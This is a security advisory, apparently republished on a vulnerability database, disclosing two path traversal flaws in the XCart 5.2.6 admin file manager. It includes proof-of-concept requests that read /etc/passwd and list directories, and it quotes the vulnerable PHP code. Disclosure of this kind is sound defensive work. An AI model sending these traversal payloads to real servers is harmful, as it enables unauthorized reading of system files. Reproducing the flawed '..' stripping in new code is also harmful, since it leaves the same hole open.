XCart 5.2.6 Path Traversal

Published
Credit
Risk
2015.11.17
Curesec
Low
CWE
CVE
Local
Remote
CWE-22
N/A
No
Yes

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: XCart 5.2.6
Fixed in: 5.2.7
Fixed Version Link: https://www.x-cart.com/xc5kit
Vendor Contact: support@x-cart.com
Vulnerability Type: Path Traversal
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 11/04/2015
Release mode: Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH

2. Arbitrary File Download

Description

When downloading a file, the input is not properly protected against directory
traversal, which makes it possible to download arbitrary files.

Please note that admin credentials are required.

Proof of Concept


http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php
POST: path=/....//....//....//....//....//....//....//....//..etc/passwd&name=download.txt

Code


/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php:10
$path=joinPaths($root,$upload_dir,$_POST['path']);
$path=str_replace(LC_DS . '..', '', $path);
$name=$_POST['name'];

header('Pragma: private');
header('Cache-control: private, must-revalidate');
header("Content-Type: application/octet-stream");
header("Content-Length: " .(string)(filesize($path)) );
header('Content-Disposition: attachment; filename="'.($name).'"');
readfile($path);

3. List Directories

Description

It is possible to list the directories contained by any directory due to a
directory traversal vulnerability via the fldr POST argument. This may be used
to gather information about the target system.

Please note that admin credentials are required.

Proof of Concept


http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?type=0&editor=mce_0&popup=0&lang=en_EN&field_id=&fldr=../../../../../../

4. Solution

To mitigate this issue please upgrade at least to version 5.2.7:

https://www.x-cart.com/xc5kit

Please note that a newer version might already be available.

5. Report Timeline

08/13/2015 Informed Vendor about Issue
09/03/2015 Vendor Requests more time
10/19/2015 Vendor releases fix
11/04/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/XCart-526-Path-Traversal-85.html



See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com